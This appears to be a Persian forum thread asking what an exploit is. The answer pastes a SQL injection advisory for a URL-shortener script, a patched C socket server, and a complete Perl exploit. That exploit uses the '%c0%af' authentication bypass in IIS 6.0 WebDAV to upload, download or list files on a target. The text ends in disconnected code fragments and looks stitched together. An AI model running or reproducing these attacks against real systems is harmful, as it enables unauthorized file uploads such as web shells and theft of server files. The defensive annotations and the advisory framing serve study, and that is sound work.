01-24-2012، 12:32 PM
تو اكثر جاهايي كه با هك سر و كار دارن اين كلمه زياد به چشم ميخوره. مي خواستم بدونم يعني چي؟ معنيش چيه؟ به چه كاري مياد؟
Title: اكسپلوييت چيه؟
url shortener script 1.0 sql injection Vulnerabilities
===================================================================================
# Exploit Title: url shortener script 1.0 sql injection Vulnerabilities
# Author: M.Jock3R
# Script Support Link: http://djpate.com/
# Download Script: http://www.phpkode.com/scripts/item/url-shortener-script/
# Category:: webapps
# Tested on: windows XP Sp2 FR
===================================================================================
Vuln file : show.php
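Vuln Code (addslashes() only escapes quote characters; $id is placed into the query unquoted, so the escaping does not restrict what reaches the SQL statement. Casting the id to an integer or using a prepared statement closes the hole) :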
if($_GET['id']){
require("mysql.php");
$id = addslashes($_GET['id']);
$getUrl = mysql_query("select url from urls where id = $id");
Exploit:
http://localhost/url-shortener-script/show.php?id=[Inj3ct]
===================================================================================
Greets To :
adelsbm / attiadona / Wjunction forum
---------------------------------
I Love you Mindy
---------------------------------
Email : madrido.jocker@gmail.com
THANKS TO ALL ALGERIANS HACK3RS
-------------------------------------------- vulnerable.c ----------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
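#define BUFFER_SIZE 1024
#define NAME_SIZE 2048
/*
 * handling - greet one connected client.
 *
 * Sends the prompt "My name is: ", reads one reply of at most NAME_SIZE
 * bytes, drops its last byte (assumed to be the trailing newline) and
 * answers with "Hello <name>, nice to meet you!\r\n".
 *
 * c: connected socket descriptor.
 *
 * Returns 0 on success, -1 if a send/recv fails or the peer closes the
 * connection before sending a name.
 *
 * Security note: name[] (NAME_SIZE) is larger than buffer[] (BUFFER_SIZE).
 * Formatting the name with an unbounded sprintf() lets a reply longer than
 * roughly 1000 bytes write past the end of buffer[] on the stack. The
 * greeting is therefore built with snprintf() and a precision that caps the
 * name so the complete line, including "\r\n" and the NUL, always fits.
 */
int handling(int c)
{
    static const char prompt[] = "My name is: ";
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    int bytes, max_name;

    bytes = send(c, prompt, sizeof(prompt) - 1, 0);
    if (bytes == -1)
        return -1;

    bytes = recv(c, name, sizeof(name), 0);
    /* 0 means the peer closed the connection; indexing name[bytes - 1]
     * would then write before the start of the array. */
    if (bytes <= 0)
        return -1;
    name[bytes - 1] = '\0';

    /* Room left for the name once the fixed text and the NUL are counted. */
    max_name = (int)(sizeof(buffer) - sizeof("Hello , nice to meet you!\r\n"));
    snprintf(buffer, sizeof(buffer), "Hello %.*s, nice to meet you!\r\n",
             max_name, name);

    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;

    return 0;
}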
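/*
 * main - iterative TCP server: accept a client, run handling() on it,
 * close the connection, repeat.
 *
 * argv[1]: decimal TCP port to listen on (1-65535).
 *
 * Exit codes: 1 bad usage or port, 2 socket() failed, 3 bind() failed,
 * 4 listen() failed, 5 accept() failed.
 *
 * Note: the socket is bound to INADDR_ANY, i.e. every local interface.
 * For a lab exercise, run it only on an isolated host or network.
 */
int main(int argc, char *argv[])
{
    int s, c;
    long port;
    char *end;
    socklen_t cli_size;
    struct sockaddr_in srv, cli;

    if (argc != 2)
    {
        fprintf(stderr, "usage: %s port\n", argv[0]);
        return 1;
    }

    /* Reject non-numeric or out-of-range ports instead of silently
     * truncating whatever atol() would have returned. */
    port = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || port < 1 || port > 65535)
    {
        fprintf(stderr, "usage: %s port\n", argv[0]);
        return 1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        perror("socket() failed");
        return 2;
    }

    /* Zero the structure so padding bytes are not left uninitialised. */
    memset(&srv, 0, sizeof(srv));
    srv.sin_addr.s_addr = INADDR_ANY;
    srv.sin_port = htons((unsigned short int) port);
    srv.sin_family = AF_INET;
    if (bind(s, (struct sockaddr *) &srv, sizeof(srv)) == -1)
    {
        perror("bind() failed");
        return 3;
    }

    if (listen(s, 3) == -1)
    {
        perror("listen() failed");
        return 4;
    }

    for (;;)
    {
        /* accept() reads this value as the size of cli, so it must be
         * set before every call. */
        cli_size = sizeof(cli);
        c = accept(s, (struct sockaddr *) &cli, &cli_size);
        if (c == -1)
        {
            perror("accept() failed");
            return 5;
        }
        /* Newline added so each log line is flushed and readable. */
        printf("client from %s\n", inet_ntoa(cli.sin_addr));
        if (handling(c) == -1)
            fprintf(stderr, "%s: handling() failed\n", argv[0]);
        close(c);
    }

    return 0; /* not reached */
}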
#!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS Windows WebDav for IIS 6.0 V1.0
use IO::Socket;
use Getopt::Long;
# Globals Go Here.
# Command-line settings; each one is filled in by the GetOptions call below.
# The script does not enable strict/warnings, so the other variables it uses
# later ($error, @results, $flag, ...) are undeclared package globals.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # Method selector from -method: "p", "g" or "l" (mapped to an HTTP verb further down).
my $xpath; # WebDAV path on Webserver.
my $file; # file name.
my $httpmethod; # HTTP verb chosen from $method: PUT, GET or PROPFIND.
my $Host_Header; # Request header block (plus the XML body for PROPFIND), built per method below.
# Parse the switches. -help / -? prints the banner through hello() and exits
# before any network activity takes place.
GetOptions(
"target=s" => \$target,
"port=i" => \$port,
"method=s" => \$method,
"xpath=s" => \$xpath,
"file=s" => \$file,
"help|?" => sub {
hello();
exit;
}
);
# Collect one message per missing mandatory option in $error, then bail out
# with a usage hint if anything was missing.
$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a target port\n" if ((!$port));
$error .= "Error: You must specify a put or get method\n" if ((!$method));
$error .= "Error: You must specify a webdav path\n" if ((!$xpath));
# NOTE(review): `!=` is the numeric comparison; for a string comparison
# against "l" the operator would be `ne`.
$error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l");
if ($error) {
print "Try IIS6_webdav_upload_file.pl -help or -?' for more information.\n$error\n";
exit;
}
hello();
# Translate the one-letter selector into the HTTP verb used for the request.
# Any other value is rejected and the script exits.
if ($method eq "p") {
$httpmethod = "PUT";
} elsif ($method eq "g") {
$httpmethod = "GET";
} elsif ($method eq "l") {
$httpmethod = "PROPFIND";
} else {
print "$method Method not accept !!!\n";
exit(0);
}
# ************************************
# * Test the WebDAV methods first    *
# ************************************
# Pre-flight probe: send "OPTIONS /" and read the response headers to decide
# whether the request is worth sending at all. The script stops when
#   - the Server header does not mention Microsoft-IIS,
#   - no "DAV:" header is present (WebDAV treated as disabled), or
#   - the "Public:" header does not list the chosen verb.
# Defender's view: all three decisions rest on what the server advertises in
# its OPTIONS reply, so a host that does not need WebDAV should have it
# switched off rather than merely unused.
print "-" x 60 ."\n";
print "Testing WebDAV methods [$target $port]\n";
print "-" x 60 ."\n";
@results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$target,$port,10);
# sendraw2 returns a single element ("0" or "Timeout") on failure, so a
# result with fewer than two lines is reported as a timeout.
if ($#results < 1){die "10s timeout to $target on port $port\n";}
#print @results;
# $flag records whether a DAV: header was seen.
$flag="off";
foreach $line (@results){
if ($line =~ /^Server: /){
($left,$right)=split(/\:/,$line);
$right =~ s/ //g;
print "$target : Server type is : $right";
if ($right !~ /Microsoft-IIS/i){
print "$target : Not a Microsoft IIS Server\n";
exit(0);
}
}
if ($line =~ /^DAV: /){
$flag="on";
}
# Public: is only examined once a DAV: header has already been seen.
if ($line =~ /^Public: / && $flag eq "on"){
($left,$right)=split(/\:/,$line);
$right =~ s/ //g;
print "$target : Method type is : $right";
if ($right !~ /$httpmethod/i){
print "$target : Not allow $httpmethod on this WebDAV Server\n";
exit(0);
} else {
$flag="on";
}
}
}
if ($flag eq "off") {
print "$target : WebDAV disable\n";
exit(0);
}
#end of WebDAV testing.
# Build the per-method header block in $Host_Header and, for PUT, load the
# local file into $content.
print "-" x 60 ."\n";
my $content;
my $data;
if ($httpmethod eq "PUT") {
# Size of the local file; used both as the read length and as Content-Length.
$filesize = -s $file;
print "$file size is $filesize bytes\n";
# NOTE(review): two-argument open on a name taken from the command line;
# the three-argument form with an explicit '<' mode is the safe idiom.
open(INFO, $file) || die("Could not open file!");
#@lines=<INFO>;
binmode(INFO); #binary
while(read(INFO, $data, $filesize))
{
$content .= $data;
}
close(INFO);
#print $content;
# Every PUT and GET carries a "Translate: f" request header. That header is
# a useful search term when reviewing web-server logs or proxy captures for
# traffic produced by this script.
$Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";
} elsif ($httpmethod eq "GET") {
$Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
} elsif ($httpmethod eq "PROPFIND") {
# The header block declares Content-Length: 0, yet an XML propfind body is
# appended after the blank line on the next statement.
$Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
$Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n";
# ************************************
# * Sending HTTP request for WebDAV *
# ************************************
# One request is sent per run. In all three branches the request path starts
# with "/%c0%af" (an overlong UTF-8 encoding of "/") ahead of the WebDAV
# path. Defender's view: that byte sequence at the start of a request URI,
# together with the Translate: f header on PUT/GET, is the log and IDS
# indicator for this script; the remedies are the vendor fix for IIS 6.0
# WebDAV and disabling WebDAV where it is not required.
if ($httpmethod eq "PUT") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "GET") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "PROPFIND") {
@results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
}
#print @results;
# Decide success from the status line: any 2xx line sets the flag, any 4xx
# line clears it. Other status classes leave the flag unchanged.
$flag="off";
foreach $line (@results){
if ($line =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){
$flag="on";
}
if ($line =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){
$flag="off";
}
}
print "-" x 60 ."\n";
if ($flag eq "on") {
if ($httpmethod eq "PUT") {
print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
} elsif ($httpmethod eq "GET") {
# Find the "Accept-Ranges: bytes" header; $line_no ends up as the 1-based
# position of that line (or the total line count if it never appears).
my $line_no = 0;
my $counter = @results;
foreach $line (@results){
++$line_no;
if ($line =~ /^Accept-Ranges: bytes\r\n/){
last;
}
}
# Write file to disk
# NOTE(review): two-argument open with the mode glued to a name taken from
# the command line, and the bytes written come from the remote server; the
# three-argument form (open HANDLE, '>', $file) is the safe idiom.
open(OUTFILE, ">$file") or die "Could not write to file: $!\n";
binmode (OUTFILE);
# The slice starts two lines after the Accept-Ranges header (presumably
# skipping the blank header/body separator - confirm) and runs to $counter,
# which is one past the last valid index of @results.
print OUTFILE @results[$line_no+1..$counter];
close(OUTFILE);
print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";
} elsif ($httpmethod eq "PROPFIND") {
print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
# Take the first response line that begins with an XML declaration, split
# it on "<a:href>" and print the text of each piece up to its next "<".
foreach $line (@results){
if ($line =~ /^\<\?xml version\=/i){
my @list = split("<a:href>", $line);
foreach $path (@list) {
$no = index($path,"<");
$result.=substr($path, 0, $no)."\n";
}
print $result;
last;
}
}
}
} else {
print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";
}
print "-" x 60 ."\n";
exit(0);
# *************
# * Sendraw-2 *
# *************
# sendraw2($pstr, $realip, $realport, $timeout)
# Open a TCP connection to $realip:$realport, write $pstr to it unchanged and
# read the reply until end of stream.
# Returns the reply as a list of lines, the one-element list "0" when the
# connection cannot be made, or "Timeout" when the timeout branch is taken.
# alarm($timeout) guards both the connect and the read phase; the handler is
# ermm().
sub sendraw2 {
my ($pstr,$realip,$realport,$timeout)=@_;
my $target2 = inet_aton($realip);
# NOTE(review): this is a lexical, while ermm() assigns an undeclared
# $flagexit (a package variable), so the check inside the read loop appears
# unable to see the handler's update - confirm.
my $flagexit=0;
$SIG{ALRM}=\&ermm;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
alarm($timeout);
# The socket address is packed by hand: family 2, port, 4-byte address, padding.
if (connect(S,pack "SnA4x8",2,$realport,$target2)){
alarm(0);
my @in;
# Make the socket the default output handle and unbuffer it, so the bare
# print below writes to the socket.
select(S); $|=1;
print $pstr;
alarm($timeout);
while(<S>){
if ($flagexit == 1){
# This return path does not switch the default output handle back to STDOUT.
close (S);
print STDOUT "Timeout\n";
return "Timeout";
}
push @in, $_;
}
alarm(0);
select(STDOUT);
close(S);
return @in;
} else {return "0";}
}
# SIGALRM handler installed by sendraw2: marks the timeout in the package
# variable $flagexit and closes the socket handle S, which ends any read
# that is in progress on it.
sub ermm{
$flagexit=1;
close (S);
}
# hello: print the banner and the usage summary to the currently selected
# output handle. Takes no arguments.
sub hello {
    my @banner_lines = (
        "\n",
        "\t #################################################\n",
        "\t # MS Windows WebDav for IIS 6.0 V1.0 #\n",
        "\t # ************* !!! WARNING !!! ************ #\n",
        "\t # ** FOR PRIVATE AND EDUCATIONAL USE ONLY! * #\n",
        "\t # ****************************************** #\n",
        "\t # Created by csg 20090524 csgcsg(at)walla.com #\n",
        "\t #################################################\n",
    );
    my @usage_lines = (
        "\n\t -target\t\t eg.: 127.0.0.1\n",
        "\t -port\t\t\t eg.: 80\n",
        "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n",
        "\t -webdavpath\t\t eg.: webdav\n",
        "\t -file\t\t\t eg.: test.aspx\n\n",
        "\tUsage eg.: \n\tIIS6_webdav.pl -t 127.0.0.1 -p 80 -m p -x webdav -f test.aspx\n",
    );
    # Emit the pieces one at a time, in order.
    for my $text (@banner_lines, @usage_lines) {
        print $text;
    }
};
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#!/usr/bin/perl